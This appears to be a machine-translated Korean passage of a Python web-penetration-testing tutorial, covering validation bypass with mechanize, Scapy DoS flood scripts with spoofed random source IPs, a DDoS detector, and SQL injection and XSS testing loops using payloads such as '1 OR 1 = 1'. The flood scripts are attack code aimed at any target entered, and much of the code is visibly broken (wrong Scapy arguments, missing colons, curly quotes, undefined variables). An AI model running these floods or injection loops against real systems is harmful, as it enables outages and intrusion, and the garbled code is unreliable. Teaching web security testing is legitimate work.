포스트 백 세션 동안 서버 측에서 발생하는 사용자 입력 유효성 검사가 호출됩니다. server-side validation. PHP 및 ASP.Net과 같은 언어는 서버 측 유효성 검사를 사용합니다. 서버 측의 유효성 검사 프로세스가 끝나면 새 동적 웹 페이지를 생성하여 피드백이 클라이언트로 다시 전송됩니다. 서버 측 유효성 검사를 통해 악의적 인 사용자로부터 보호 할 수 있습니다.
반면에 클라이언트 측에서 발생하는 사용자 입력 유효성 검사를 클라이언트 측 유효성 검사라고합니다. JavaScript 및 VBScript와 같은 스크립팅 언어는client-side validation. 이러한 종류의 유효성 검사에서 모든 사용자 입력 유효성 검사는 사용자의 브라우저에서만 수행됩니다. 해커가 클라이언트 측 스크립팅 언어를 쉽게 우회하고 위험한 입력을 서버에 제출할 수 있기 때문에 서버 측 유효성 검사처럼 안전하지 않습니다.
클라이언트 측 매개 변수 조정 : 유효성 검사 우회
HTTP 프로토콜에서 매개 변수 전달은 POST 및 GET 메소드를 사용하여 수행 할 수 있습니다. GET은 지정된 리소스에서 데이터를 요청하는 데 사용되며 POST는 리소스를 생성하거나 업데이트하기 위해 서버로 데이터를 보내는 데 사용됩니다. 이 두 방법의 주요 차이점은 웹 사이트가 GET 메서드를 사용하는 경우 전달 매개 변수가 URL에 표시되고이 매개 변수를 변경하여 웹 서버에 전달할 수 있다는 것입니다. 예를 들어 쿼리 문자열 (이름 / 값 쌍)은 GET 요청의 URL로 전송됩니다./test/hello_form.php?name1 = value1&name2 = value2. 반면에 POST 메서드를 사용하는 동안에는 매개 변수가 표시되지 않습니다. POST를 통해 서버로 전송 된 데이터는 HTTP 요청의 요청 본문에 저장됩니다. 예 : POST/test/hello_form.php HTTP/1.1 Host: ‘URL’ name1 = value1&name2 = value2.
유효성 검사 우회를위한 Python 모듈
우리가 사용할 파이썬 모듈은 mechanize. 웹 페이지에서 웹 양식을 얻는 기능을 제공하고 입력 값의 제출도 용이하게하는 Python 웹 브라우저입니다. 기계화의 도움으로 유효성 검사를 우회하고 클라이언트 측 매개 변수를 조정할 수 있습니다. 그러나 Python 스크립트로 가져 오기 전에 다음 명령을 실행하여 설치해야합니다.
pip install mechanize
예
다음은 mechanize를 사용하여 POST 메서드를 사용하여 매개 변수를 전달하는 웹 양식의 유효성 검사를 우회하는 Python 스크립트입니다. 웹 양식은 링크에서 가져올 수 있습니다.https://www.tutorialspoint.com/php/php_validation_example.htm 원하는 모든 더미 웹 사이트에서 사용할 수 있습니다.
우선 기계화 브라우저를 가져 오겠습니다.
import mechanize
이제 우리는 brwsr 기계화 브라우저의-
brwsr = mechanize.Browser()
다음 코드 줄은 사용자 에이전트가 로봇이 아님을 보여줍니다.
brwsr.set_handle_robots( False )
이제 유효성 검사를 우회해야하는 웹 양식이 포함 된 더미 웹 사이트의 URL을 제공해야합니다.
url = input("Enter URL ")
이제 다음 줄은 일부 부모를 true로 설정합니다.
brwsr.set_handle_equiv(True)
brwsr.set_handle_gzip(True)
brwsr.set_handle_redirect(True)
brwsr.set_handle_referer(True)
다음으로 웹 페이지가 열리고 해당 페이지에 웹 양식이 인쇄됩니다.
brwsr.open(url)
for form in brwsr.forms():
print form
다음 코드 줄은 주어진 필드에 대한 유효성 검사를 우회합니다.
brwsr.select_form(nr = 0)
brwsr.form['name'] = ''
brwsr.form['gender'] = ''
brwsr.submit()
스크립트의 마지막 부분은 유효성 검사를 우회하려는 웹 양식의 필드에 따라 변경할 수 있습니다. 위의 스크립트에서는 두 개의 필드를 사용했습니다.‘name’ 과 ‘gender’ 비워 둘 수는 없지만 (웹 양식 코딩에서 볼 수 있음)이 스크립트는 해당 유효성 검사를 우회합니다.
이 장에서는 DoS 및 DdoS 공격에 대해 배우고이를 탐지하는 방법을 이해합니다.
전자 상거래 산업의 붐과 함께 웹 서버는 이제 공격을 받기 쉽고 해커의 쉬운 표적이되었습니다. 해커는 일반적으로 두 가지 유형의 공격을 시도합니다.
- DoS (서비스 거부)
- DDoS (분할 된 서비스 거부)
DoS (Denial-of-Service) 공격
서비스 거부 (DoS) 공격은 해커가 네트워크 리소스를 사용할 수 없게 만드는 시도입니다. 일반적으로 인터넷에 연결된 호스트를 일시적으로 또는 무기한으로 중단합니다. 이러한 공격은 일반적으로 은행, 신용 카드 결제 게이트웨이와 같은 미션 크리티컬 웹 서버에서 호스팅되는 서비스를 대상으로합니다.
DoS 공격의 증상
비정상적으로 느린 네트워크 성능.
특정 웹 사이트를 사용할 수 없습니다.
웹 사이트에 액세스 할 수 없습니다.
수신 된 스팸 이메일 수가 급격히 증가했습니다.
웹 또는 인터넷 서비스에 대한 장기적인 액세스 거부.
특정 웹 사이트를 사용할 수 없습니다.
DoS 공격 유형 및 Python 구현
DoS 공격은 데이터 링크, 네트워크 또는 애플리케이션 계층에서 구현 될 수 있습니다. 이제 다양한 유형의 DoS 공격에 대해 알아 보겠습니다. 파이썬에서의 구현-
단일 IP 단일 포트
단일 IP 및 단일 포트 번호를 사용하여 많은 수의 패킷이 웹 서버로 전송됩니다. 웹 서버의 동작을 확인하는 데 사용되는 저수준 공격입니다. Scapy의 도움으로 Python으로 구현할 수 있습니다. 다음 파이썬 스크립트는 단일 IP 단일 포트 DoS 공격을 구현하는 데 도움이됩니다.
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1
while True:
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter = .001)
print ("packet sent ", i)
i = i + 1
실행시 위의 스크립트는 다음 세 가지를 요청합니다.
소스 및 대상의 IP 주소입니다.
소스 포트 번호의 IP 주소입니다.
그런 다음 동작을 확인하기 위해 많은 수의 패킷을 서버로 보냅니다.
단일 IP 다중 포트
단일 IP를 사용하고 여러 포트에서 많은 수의 패킷이 웹 서버로 전송됩니다. Scapy의 도움으로 Python으로 구현할 수 있습니다. 다음 파이썬 스크립트는 단일 IP 다중 포트 DoS 공격을 구현하는 데 도움이됩니다.
from scapy.all import *
source_IP = input("Enter IP address of Source: ")
target_IP = input("Enter IP address of Target: ")
i = 1
while True:
for source_port in range(1, 65535)
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt, inter = .001)
print ("packet sent ", i)
i = i + 1
다중 IP 단일 포트
다중 IP를 사용하고 단일 포트 번호에서 많은 수의 패킷이 웹 서버로 전송됩니다. Scapy의 도움으로 Python으로 구현할 수 있습니다. 다음 Python 스크립트는 단일 IP 다중 포트 DoS 공격을 구현합니다.
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
source_port = int(input("Enter Source Port Number:"))
i = 1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = “.”
Source_ip = a + dot + b + dot + c + dot + d
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt,inter = .001)
print ("packet sent ", i)
i = i + 1
다중 IP 다중 포트
여러 IP와 여러 포트를 사용하여 많은 수의 패킷이 웹 서버로 전송됩니다. Scapy의 도움으로 Python으로 구현할 수 있습니다. 다음 Python 스크립트는 다중 IP 다중 포트 DoS 공격을 구현하는 데 도움이됩니다.
Import random
from scapy.all import *
target_IP = input("Enter IP address of Target: ")
i = 1
while True:
a = str(random.randint(1,254))
b = str(random.randint(1,254))
c = str(random.randint(1,254))
d = str(random.randint(1,254))
dot = “.”
Source_ip = a + dot + b + dot + c + dot + d
for source_port in range(1, 65535)
IP1 = IP(source_IP = source_IP, destination = target_IP)
TCP1 = TCP(srcport = source_port, dstport = 80)
pkt = IP1 / TCP1
send(pkt,inter = .001)
print ("packet sent ", i)
i = i + 1
DDoS (분산 서비스 거부) 공격
DDoS (Distributed Denial of Service) 공격은 온라인 서비스 또는 웹 사이트를 여러 소스에서 생성 된 엄청난 양의 트래픽으로 과부하시켜 사용할 수 없게 만드는 시도입니다.
한 대의 컴퓨터와 한 대의 인터넷 연결을 사용하여 대상 리소스를 패킷으로 플러딩하는 서비스 거부 (DoS) 공격과 달리 DDoS 공격은 많은 컴퓨터와 많은 인터넷 연결을 사용하며 종종 봇넷이라고하는 전역에 분산되어 있습니다. . 대규모 볼륨 DDoS 공격은 초당 수십 기가비트 (심지어 수백 기가비트)로 측정되는 트래픽을 생성 할 수 있습니다. 자세한 내용은https://www.tutorialspoint.com/ethical_hacking/ethical_hacking_ddos_attacks.htm.
Python을 사용한 DDoS 감지
실제로 DDoS 공격은 트래픽을 보내는 호스트가 가짜인지 실제인지 모르기 때문에 탐지하기가 약간 어렵습니다. 아래 제공된 Python 스크립트는 DDoS 공격을 감지하는 데 도움이됩니다.
우선 필요한 라이브러리를 가져 오겠습니다.
import socket
import struct
from datetime import datetime
이제 이전 섹션에서도 생성 한 소켓을 생성합니다.
s = socket.socket(socket.PF_PACKET, socket.SOCK_RAW, 8)
빈 사전을 사용합니다.
dict = {}
다음 코드 줄은 추가 모드에서 DDoS 공격에 대한 세부 정보가 포함 된 텍스트 파일을 엽니 다.
file_txt = open("attack_DDoS.txt",'a')
t1 = str(datetime.now())
다음 코드 줄의 도움으로 프로그램이 실행될 때마다 현재 시간이 기록됩니다.
file_txt.writelines(t1)
file_txt.writelines("\n")
이제 특정 IP의 히트를 가정해야합니다. 여기서 우리는 특정 IP가 15 회 이상 적중되면 공격이라고 가정합니다.
No_of_IPs = 15
R_No_of_IPs = No_of_IPs +10
while True:
pkt = s.recvfrom(2048)
ipheader = pkt[0][14:34]
ip_hdr = struct.unpack("!8sB3s4s4s",ipheader)
IP = socket.inet_ntoa(ip_hdr[3])
print "The Source of the IP is:", IP
다음 코드 줄은 IP가 사전에 있는지 여부를 확인합니다. 존재하는 경우 1 씩 증가합니다.
if dict.has_key(IP):
dict[IP] = dict[IP]+1
print dict[IP]
다음 코드 줄은 중복을 제거하는 데 사용됩니다.
if(dict[IP] > No_of_IPs) and (dict[IP] < R_No_of_IPs) :
line = "DDOS attack is Detected: "
file_txt.writelines(line)
file_txt.writelines(IP)
file_txt.writelines("\n")
else:
dict[IP] = 1
위의 스크립트를 실행하면 결과를 텍스트 파일로 얻을 수 있습니다. 스크립트에 따르면 IP가 15 회 이상 적중하면 해당 IP 주소와 함께 DDoS 공격이 감지되어 인쇄됩니다.
SQL 주입은 웹 애플리케이션과 연결된 데이터베이스에서 원하는 응답을 검색하기 위해 URL 문자열 또는 데이터 구조에 배치되는 SQL 명령 세트입니다. 이러한 유형의 공격 k는 일반적으로 PHP 또는 ASP.NET을 사용하여 개발 된 웹 페이지에서 발생합니다.
SQL 주입 공격은 다음과 같은 의도로 수행 할 수 있습니다.
데이터베이스의 내용을 수정하려면
데이터베이스의 내용을 수정하려면
응용 프로그램에서 허용하지 않는 다른 쿼리를 수행하려면
이러한 유형의 공격은 애플리케이션이 입력을 SQL 문으로 전달하기 전에 입력을 올바르게 검증하지 않을 때 작동합니다. 삽입은 일반적으로 주소 표시 줄, 검색 필드 또는 데이터 필드에 배치됩니다.
웹 애플리케이션이 SQL 주입 공격에 취약한 지 감지하는 가장 쉬운 방법은 문자열에 " '"문자를 사용하여 오류가 발생하는지 확인하는 것입니다.
SQLi 공격 유형
이 섹션에서는 다양한 유형의 SQLi 공격에 대해 알아 봅니다. 공격은 다음 두 가지 유형으로 분류 할 수 있습니다.
대역 내 SQL 주입 (Simple SQLi)
추론 SQL 주입 (Blind SQLi)
대역 내 SQL 주입 (Simple SQLi)
가장 일반적인 SQL 주입입니다. 이러한 종류의 SQL 주입은 주로 공격자가 동일한 통신 채널을 사용하여 공격을 시작하고 결과를 수집 할 수있을 때 발생합니다. 대역 내 SQL 주입은 두 가지 유형으로 더 나뉩니다.
Error-based SQL injection − 오류 기반 SQL 인젝션 기법은 데이터베이스의 구조에 대한 정보를 얻기 위해 데이터베이스 서버에서 발생하는 오류 메시지에 의존합니다.
Union-based SQL injection − UNION SQL 연산자를 활용하여 두 개 이상의 SELECT 문의 결과를 단일 결과로 결합한 다음 HTTP 응답의 일부로 반환하는 또 다른 인 밴드 SQL 주입 기술입니다.
추론 SQL 주입 (Blind SQLi)
이러한 종류의 SQL 인젝션 공격에서 공격자는 웹 애플리케이션을 통해 데이터가 전송되지 않기 때문에 대역 내 공격의 결과를 볼 수 없습니다. 이것이 Blind SQLi라고도 불리는 이유입니다. 추론 SQL 주입은 두 가지 유형이 더 있습니다.
Boolean-based blind SQLi − 이러한 종류의 기술은 SQL 쿼리를 데이터베이스로 전송하는 데 의존하며, 쿼리가 TRUE 또는 FALSE 결과를 반환하는지 여부에 따라 응용 프로그램이 다른 결과를 반환하도록합니다.
Time-based blind SQLi− 이러한 종류의 기술은 데이터베이스에 SQL 쿼리를 전송하여 데이터베이스가 응답하기 전에 지정된 시간 (초) 동안 대기하도록합니다. 응답 시간은 쿼리 결과가 참인지 거짓인지를 공격자에게 알려줍니다.
예
모든 유형의 SQLi는 애플리케이션에 대한 입력 데이터를 조작하여 구현할 수 있습니다. 다음 예제에서는 공격 벡터를 애플리케이션에 주입하고 출력을 분석하여 공격 가능성을 확인하는 Python 스크립트를 작성합니다. 여기서는 python 모듈을 사용할 것입니다.mechanize, 이는 웹 페이지에서 웹 양식을 얻는 기능을 제공하고 입력 값의 제출도 용이하게합니다. 또한이 모듈을 클라이언트 측 유효성 검사에 사용했습니다.
다음 Python 스크립트는 다음을 사용하여 양식을 제출하고 응답을 분석하는 데 도움이됩니다. mechanize −
우선 우리는 mechanize 기준 치수.
import mechanize
이제 양식을 제출 한 후 응답을 받기위한 URL의 이름을 제공하십시오.
url = input("Enter the full url")
다음 코드 줄은 URL을 엽니 다.
request = mechanize.Browser()
request.open(url)
이제 양식을 선택해야합니다.
request.select_form(nr = 0)
여기서는 열 이름 'id'를 설정합니다.
request["id"] = "1 OR 1 = 1"
이제 양식을 제출해야합니다.
response = request.submit()
content = response.read()
print content
위 스크립트는 POST 요청에 대한 응답을 인쇄합니다. SQL 쿼리를 중단하고 하나의 행이 아닌 테이블의 모든 데이터를 인쇄하기 위해 공격 벡터를 제출했습니다. 모든 공격 벡터는 vectors.txt라는 텍스트 파일에 저장됩니다. 이제 아래 제공된 Python 스크립트는 파일에서 공격 벡터를 가져 와서 하나씩 서버로 보냅니다. 또한 출력을 파일에 저장합니다.
먼저 mechanize 모듈을 가져 오겠습니다.
import mechanize
이제 양식을 제출 한 후 응답을 받기위한 URL의 이름을 제공하십시오.
url = input("Enter the full url")
attack_no = 1
파일에서 공격 벡터를 읽어야합니다.
With open (‘vectors.txt’) as v:
이제 각 arrack 벡터와 함께 요청을 보냅니다.
For line in v:
browser.open(url)
browser.select_form(nr = 0)
browser[“id”] = line
res = browser.submit()
content = res.read()
이제 다음 코드 줄이 출력 파일에 대한 응답을 작성합니다.
output = open(‘response/’ + str(attack_no) + ’.txt’, ’w’)
output.write(content)
output.close()
print attack_no
attack_no += 1
대응을 확인하고 분석하여 가능한 공격을 식별 할 수 있습니다. 예를 들어, 문장이 포함 된 응답을 제공하는 경우You have an error in your SQL syntax 그러면 양식이 SQL 주입의 영향을받을 수 있음을 의미합니다.
교차 사이트 스크립팅 공격은 클라이언트 측 코드 삽입 공격을 참조하는 삽입 유형입니다. 여기서 합법적 인 웹 사이트에 악성 코드가 주입됩니다. SOP (Same Origin Policy)의 개념은 사이트 간 스크립팅의 개념을 이해하는 데 매우 유용합니다. SOP는 모든 웹 브라우저에서 가장 중요한 보안 원칙입니다. 웹 사이트가 다른 출처의 페이지에서 콘텐츠를 검색하는 것을 금지합니다. 예를 들어, 웹 페이지 www.tutorialspoint.com/index.html 은www.tutorialspoint.com/contact.html그러나 www.virus.com/index.html 은www.tutorialspoint.com/contact.html. 이런 식으로 크로스 사이트 스크립팅이 SOP 보안 정책을 우회하는 방법이라고 말할 수 있습니다.
XSS 공격 유형
이 섹션에서는 다양한 유형의 XSS 공격에 대해 알아 보겠습니다. 공격은 다음과 같은 주요 범주로 분류 할 수 있습니다.
- 영구 또는 저장된 XSS
- 비 영구적 또는 반사 된 XSS
영구 또는 저장된 XSS
이러한 종류의 XSS 공격에서 공격자는 대상 웹 애플리케이션 (예 : 데이터베이스 내)에 영구적으로 저장되는 페이로드라고하는 스크립트를 삽입합니다. 이것이 바로 지속적인 XSS 공격이라고하는 이유입니다. 실제로 가장 위험한 유형의 XSS 공격입니다. 예를 들어 공격자가 블로그의 댓글 필드 나 포럼 게시물에 악성 코드를 삽입했습니다.
비 영구적 또는 반사 된 XSS
공격자의 페이로드가 요청의 일부가되어야하는 가장 일반적인 유형의 XSS 공격으로, 웹 서버로 전송되고 HTTP 응답에 HTTP 요청의 페이로드가 포함되는 방식으로 다시 반영됩니다. 공격자가 각 피해자에게 페이로드를 전달해야하기 때문에 비 지속적 공격입니다. 이러한 종류의 XSS 공격의 가장 일반적인 예는 공격자가 피해자를 유인하여 XSS 페이로드가 포함 된 서버에 요청을하고 브라우저 내에서 반영되고 실행되는 스크립트를 실행하는 피싱 이메일입니다. .
예
SQLi와 마찬가지로 XSS 웹 공격은 애플리케이션에 대한 입력 데이터를 조작하여 구현할 수 있습니다. 다음 예제에서는 이전 섹션에서 수행 한 SQLi 공격 벡터를 수정하여 XSS 웹 공격을 테스트합니다. 아래 제공된 Python 스크립트는 다음을 사용하여 XSS 공격을 분석하는 데 도움이됩니다.mechanize −
먼저 mechanize 기준 치수.
import mechanize
이제 양식을 제출 한 후 응답을 받기위한 URL의 이름을 제공하십시오.
url = input("Enter the full url")
attack_no = 1
파일에서 공격 벡터를 읽어야합니다.
With open (‘vectors_XSS.txt’) as x:
이제 각 arrack 벡터와 함께 요청을 보냅니다.
For line in x:
browser.open(url)
browser.select_form(nr = 0)
browser[“id”] = line
res = browser.submit()
content = res.read()
다음 코드 줄은 인쇄 된 공격 벡터를 확인합니다.
if content.find(line) > 0:
print(“Possible XSS”)
다음 코드 줄은 출력 파일에 대한 응답을 작성합니다.
output = open(‘response/’ + str(attack_no) + ’.txt’, ’w’)
output.write(content)
output.close()
print attack_no
attack_no += 1
XSS는 사용자 입력이 유효성 검사없이 응답에 인쇄 될 때 발생합니다. 따라서 XSS 공격 가능성을 확인하기 위해 제공 한 공격 벡터에 대한 응답 텍스트를 확인할 수 있습니다. 이스케이프 또는 유효성 검사없이 응답에 공격 벡터가있는 경우 XSS 공격 가능성이 높습니다.